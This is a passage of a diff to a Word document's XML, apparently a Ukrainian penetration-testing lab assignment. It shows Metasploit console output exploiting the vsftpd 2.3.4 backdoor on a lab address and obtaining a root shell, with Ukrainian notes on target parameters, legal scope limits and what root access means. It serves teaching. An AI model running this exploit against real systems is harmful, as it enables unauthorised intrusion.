-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; set RHOSTS 192.168.56.101</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">RHOSTS =&gt; 192.168.56.101</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; show options</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Module options (exploit/unix/ftp/vsftpd_234_backdoor):</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   Name    Current Setting  Required  Description</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   ----    ---------------  --------  -----------</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   RHOSTS  192.168.56.101   yes       The target host(s), range CIDR identifier</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   RPORT   21               yes       The target port (TCP)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:before="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="8"/>
-          <w:szCs w:val="8"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:type="dxa" w:w="9026"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
-          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
-        </w:tblBorders>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9026"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="9026"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
-              <w:left w:val="single" w:color="2E75B6" w:sz="18"/>
-              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
-              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
-            </w:tcBorders>
-            <w:shd w:fill="FAFCFF" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="160"/>
-              <w:left w:type="dxa" w:w="280"/>
-              <w:bottom w:type="dxa" w:w="160"/>
-              <w:right w:type="dxa" w:w="280"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="1A1A1A"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve">RHOSTS (Remote Hosts) — параметр, що визначає IP-адресу або діапазон IP-адрес цільових систем для атаки. Підтримує формати: одиничний IP (192.168.56.101), CIDR-діапазон (192.168.56.0/24), файл зі списком IP.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="FAFCFF"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="1A1A1A"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Наслідки неправильного RHOSTS:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="1A1A1A"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve">У лабораторному середовищі: спроба атаки проти неіснуючого або неправильного хосту — exploit не спрацює, втрата часу.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="1A1A1A"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve">У реальному пентесті: КРИТИЧНЕ порушення scope. Якщо RHOSTS вказує за межі авторизованого IP-діапазону — пентестер атакує несанкціонований хост, що є незаконним незалежно від намірів. Це може призвести до юридичної відповідальності, відмови у виплаті та дискваліфікації результатів тесту. Саме тому пункт Go/No-Go 'Ціль підтверджена' є обов’язковим.</w:t>
+              <w:spacing w:after="60" w:before="60"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:color w:val="1A1A1A"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve">uid=0(root): у Unix/Linux системах користувач з UID=0 має необмежені права суперкористувача (root). Це означає: повний контроль над операційною системою, доступ до всіх файлів та директорій без будь-яких обмежень, можливість встановлювати/видаляти програми, змінювати системні файли, створювати нових користувачів, вимикати систему, читати будь-які приватні дані. Еквівалент 'Administrator' у Windows, але ще потужніший.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3882,371 +3065,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Завдання 2.4 — Виконання exploit</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:color w:val="2E75B6"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (7 балів)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:before="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="8"/>
-          <w:szCs w:val="8"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:type="dxa" w:w="9026"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
-          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
-        </w:tblBorders>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9026"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="9026"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:left w:val="single" w:color="00FF41" w:sz="8"/>
-              <w:bottom w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:right w:val="single" w:color="00FF41" w:sz="6"/>
-            </w:tcBorders>
-            <w:shd w:fill="0D1117" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="160"/>
-              <w:left w:type="dxa" w:w="280"/>
-              <w:bottom w:type="dxa" w:w="160"/>
-              <w:right w:type="dxa" w:w="280"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt; run</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">[*] 192.168.56.101:21 - Banner: 220 (vsFTPd 2.3.4)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">[*] 192.168.56.101:21 - USER: 331 Please specify the password.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="FF6B35"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">[+] 192.168.56.101:21 - UID: uid=0(root) gid=0(root)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">[*] Found shell.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="00FF41"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">[*] Command shell session 1 opened (192.168.56.1:46832 -&gt; 192.168.56.101:6200) at 2026-03-24 10:22:14 +0300</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">id</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="FF6B35"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">uid=0(root) gid=0(root)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:before="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="8"/>
-          <w:szCs w:val="8"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:type="dxa" w:w="9026"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
-          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
-        </w:tblBorders>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9026"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="9026"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
-              <w:left w:val="single" w:color="2E75B6" w:sz="18"/>
-              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
-              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
-            </w:tcBorders>
-            <w:shd w:fill="FAFCFF" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="160"/>
-              <w:left w:type="dxa" w:w="280"/>
-              <w:bottom w:type="dxa" w:w="160"/>
-              <w:right w:type="dxa" w:w="280"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="1A1A1A"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Ключовий рядок 1: '[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...' — підтвердження успішної активації backdoor. Сервер vsftpd 2.3.4 отримав тригер ':)' у username та відкрив backdoor-порт 6200.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="FAFCFF"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="1A1A1A"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Ключовий рядок 2: '[*] Command shell session 1 opened (192.168.56.1:46832 -&gt; 192.168.56.101:6200)' — підтвердження встановлення shell-з’єднання. Metasploit підключився до backdoor-порту 6200 на цільовій системі.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="FAFCFF"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="1A1A1A"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve">uid=0(root): у Unix/Linux системах користувач з UID=0 має необмежені права суперкористувача (root). Це означає: повний контроль над операційною системою, доступ до всіх файлів та директорій без будь-яких обмежень, можливість встановлювати/видаляти програми, змінювати системні файли, створювати нових користувачів, вимикати систему, читати будь-які приватні дані. Еквівалент 'Administrator' у Windows, але ще потужніший.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:before="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="8"/>
-          <w:szCs w:val="8"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pBdr>
-          <w:left w:val="single" w:color="2E75B6" w:sz="14"/>
-        </w:pBdr>
-        <w:shd w:fill="EBF3FB" w:val="clear"/>
-        <w:spacing w:after="60" w:before="180"/>
-        <w:ind w:left="120" w:right="120"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="2E75B6"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
         <w:t xml:space="preserve">Завдання 2.5 — Мінімальний протокол доказів</w:t>
       </w:r>
       <w:r>
@@ -4287,364 +3105,98 @@
         <w:t xml:space="preserve">Виконання 6-крокового протоколу у отриманому shell:</w:t>
       </w:r>
     </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblW w:type="dxa" w:w="9026"/>
-        <w:tblBorders>
-          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
-          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
-          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
-        </w:tblBorders>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9026"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="9026"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:left w:val="single" w:color="00FF41" w:sz="8"/>
-              <w:bottom w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:right w:val="single" w:color="00FF41" w:sz="6"/>
-            </w:tcBorders>
-            <w:shd w:fill="0D1117" w:val="clear"/>
-            <w:tcMar>
-              <w:top w:type="dxa" w:w="160"/>
-              <w:left w:type="dxa" w:w="280"/>
-              <w:bottom w:type="dxa" w:w="160"/>
-              <w:right w:type="dxa" w:w="280"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="6A9955"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"># === PROOF PROTOCOL — 2026-03-24 10:22:31 EAT ===</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">whoami</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="FF6B35"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">root</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">id</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="FF6B35"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
